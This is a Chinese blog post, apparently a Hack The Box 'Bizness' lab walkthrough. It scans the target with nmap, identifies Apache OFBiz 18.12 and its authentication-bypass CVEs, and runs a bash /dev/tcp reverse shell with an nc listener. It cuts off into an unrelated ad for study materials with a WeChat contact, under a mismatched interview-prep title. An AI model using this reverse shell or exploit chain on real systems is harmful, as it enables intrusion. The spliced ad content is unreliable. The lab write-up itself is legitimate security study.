Linux Bizness,2024年最新那些进了大厂的程序员面试前都做了哪些准备

最新推荐文章于 2024-06-12 15:58:20 发布
最新推荐文章于 2024-06-12 15:58:20 发布
阅读量919 收藏 9
点赞数 8
分类专栏: 2024年程序员学习 文章标签: linux 面试 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79098963/article/details/137568369
版权

Enumeration

nmap

用 nmap 扫描了常见的端口,发现对外开放了22,80,443

┌──(kali㉿kali)-[~]
└─$ nmap 10.10.11.252
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-08 01:21 EST
Nmap scan report for 10.10.11.252
Host is up (0.36s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 41.55 seconds

访问 80 端口,重定向至域名,将其添加至 /etc/hosts 中

添加索引后访问系统,在页面最底部发现 Powerd by Apache OFBiz

使用目录扫描工具发现了 /control/login 接口,在登录页面可以看到 OFBiz的版本为 18.12

Exploitation

Apache OFBiz漏洞

搜索该版本发现存在两个漏洞,漏洞编号分别为 CVE-2023-49070 和 CVE-2023-51467

Apache OFBiz 是一个用于企业流程自动化的开源产品。它包括 ERP、CRM、电子商务/电子商务、供应链管理和制造资源规划的框架组件和业务应用程序。OFBiz 为可靠、安全和可扩展的企业解决方案提供了基础和起点。下面这篇文章详细分析了这两个漏洞

漏洞分析Apache OFBiz Authentication Bypass Vulnerability (CVE-2023-49070 and CVE-2023-51467) - vsociety (vicarius.io) - vsociety (vicarius.io)")

在搜索漏洞 PoC 时发现了一个 gui 工具,包含了两个漏洞,用起来是真方便啊,只需要把目标 url 和要执行的命令放进去,exploit 一下结果就出来了

一开始使用了非常常见的反向 shell 连接指令

/bin/bash -i >& /dev/tcp/10.10.14.19/4444 0>&1

然后得到了下面的结果,可以执行 id 和 whoami 命令,看到第 5 行和第 6 行有两句话,查了一下。bash: cannot set terminal process group (727): Inappropriate ioctl for device。这个错误通常出现在bash shell中,当bash尝试为一个终端设置进程组时发生错误。Inappropriate ioctl for device表明bash尝试对一个不支持所需ioctl操作(输入/输出控制操作)的设备执行操作。这可能是因为bash在没有控制终端的环境中运行,例如通过某些网络服务启动的bash shell。bash: no job control in this shell。这个警告表明当前bash shell没有作业控制功能。作业控制通常允许用户在前台和后台之间切换命令的执行,并管理这些命令的状态(例如挂起、恢复或终止它们)。当bash在没有控制终端的环境中运行时,例如通过SSH的某些配置或某些非交互式服务,作业控制功能通常会被禁用

┌──(kali㉿kali)-[~]
└─$ nc -nvlp 4444
listening on [any] 4444 …

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
[外链图片转存中…(img-zRtQYLFn-1712669616121)]

2301_79098963
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024运维最新Linux Bizness(1)
2401_83974345的博客
05-01 171
【代码】2024运维最新Linux Bizness(1)
2024最全Linux Bizness
05-01 527
添加索引后访问系统,在页面最底部发现 Powerd by Apache OFBiz使用目录扫描工具发现了 /control/login 接口,在登录页面可以看到 OFBiz的版本为 18.12。
Linux Bizness
2401_83739472的博客
04-26 331
【代码】Linux Bizness。
HTB靶机渗透之bizness(linux-eazy)
m0_60351808的博客
03-08 519
靶机ip:10.10.11.252攻击机ip:10.10.16.2首先用nmap去扫描主机获取主机端口信息可以看到扫描结果中暴露了80,22,443端口,其中域名为bizness.htb,22端口的渗透优先级应该靠后,应当先行80或443端口的渗透,我们照例使用dirsearch来扫描一下网站目录扫描结果很多,总结一下暴露了后台地址,也暴露了框架为solr,后台管理系统为ofbiz18.12由于在主页没有看到任何其他的链接,所以我们暂时梳理一下目可用的信息端口:80,443,22。
Linux/Bizness
ve9etable的博客
03-19 900
用 nmap 扫描了常见的端口,发现对外开放了22,80,443访问 80 端口,重定向至域名,将其添加至 /etc/hosts 中添加索引后访问系统,在页面最底部发现 Powerd by Apache OFBiz使用目录扫描工具发现了 /control/login 接口,在登录页面可以看到 OFBiz的版本为 18.12。
Linux Bizness,2024最新50w字+的Linux运维技术类校招面试题汇总
2401_83739727的博客
04-15 704
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Linux Bizness,给网络安全程序员的一些面试建议
2401_84138968的博客
04-07 436
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Linux Bizness,2024春招BAT面试真题详解
2401_84002730的博客
04-03 912
I设计、Unity3D、Web端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**
【无标题】Hack The Box-Bizness
弟弟救我的博客
01-16 762
HTB Bizness
五大傻瓜式移动应用开发工具.pdf
11-01
AppsGeyser图片来源:DailyTut使用AppsGeyser就可以让任何人都可以应用程序的开发。当然,这个程序并不能让你创建下一个愤怒的小鸟或者Foursquare。但是你仅仅想基于Web内容建立一个非常简单的应用程序的话,...
移动终端应用程序设计方法研究报告.doc
10-08
* Android 是 Google 在 2007 发布的一款全新的智能手机终端操作系统和移动应用开发平台。 * Android 基于 Linux 核,由操作系统、中间件、用户界面和应用软件组成,是一个开放而完整的移动“软件栈”。 * Android...
App在线开发、App软件开发、App制作最常用工具.pdf
07-14
App 在线开发工具概览 App 在线开发工具是近来非常流行的一种技术,能够...这五种 App 在线开发工具都是非常流行和知名的,可以满足不同用户的需求,无论是个人还是企业,都可以使用这些工具来在线开发自己的 App。
分享Appmakr式的简易App制作8大工具
10-26
8. Bizness Apps:Bizness Apps 是一个快速创建 APP 软件的平台,目支持 iOS(iPhone、iPad)及 Android 平台,用户只需要一步在选单中选取你的 App 需要的功能即可完成本机 App 的设计。在 App 完成后,Bizness...
AUv3-Example-App:完整的应用程序
04-13
该项目是由历史悠久的莫尔豪斯学院音乐技术系的格莱美奖得主肯纳德·加勒特( Kennard Garrett)和亨尼·塔·比斯尼斯( Henny tha Bizness )共同创建的。 AudioKit开发团队由和领导。 观看视频: 此仓库目是...
Linux fallocate工具用于预分配或释放文件空间的块
不积跬步,无以至千里;不积小流,无以成江海。
06-09 295
命令,您需要在具有适当权限的环境中运行它,例如通过SSH登录到Linux服务器或在Linux终端中运行。请确保指定的路径存在且可写。文件中未使用的磁盘空间。请注意,这不会改变文件的大小,只是释放了未使用的磁盘空间。之,建议了解文件系统和存储设备的特性,以避免潜在的性能问题。是一个Linux命令行工具,用于预分配或释放文件空间的块。文件的大小截断为5MB。大于5MB的部分将被删除。文件的10MB偏移量处开始预分配5MB的磁盘空间。文件的10MB偏移量处开始的5MB磁盘空间。文件预分配10MB的磁盘空间。
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 211
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
嵌入式Linux系统编程 — 3.4 access、chmod和 umask函数修改文件访问权限
几度春风里的博客
06-09 913
文件的权限检查不仅讨论文件本身的权限,还需要涉及到文件所在目录的权限, 只有同时都满足了,才能通过操作系统的权限检查,而才可以对文件行相关操作;所以,程序当中对文件行相关操作之,需要先检查执行程的用户是否对该文件拥有相应的权限。需要行权限检查的文件路径。F_OK:检查文件是否存在R_OK:检查是否拥有读权限W_OK:检查是否拥有写权限X_OK:检查是否拥有执行权限检查项通过则返回 0,表示拥有相应的权限并且文件存在;
linux中: IDEA 由于JVM 设置内存过小,导致打开项目闪退问题
最新发布
m0_72560900的博客
06-12 333
linux(debian/ubuntu)中idea的插件默认安装位置和配置文件在哪里?
Linux Kernel入门到精通系列讲解(RV-Kernel 篇) 5.2 从零移植 Ubuntu,基于RISC-V
DSMGUOGUO的博客
06-10 153
,我们要知道几个概念,这样有助于后续移植。2. kernel和rootfs的调用关系。已经跑起来了,接下来我们就移植。3. 移植ubuntu。4. 运行ubuntu。6. 吐槽ubuntu。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值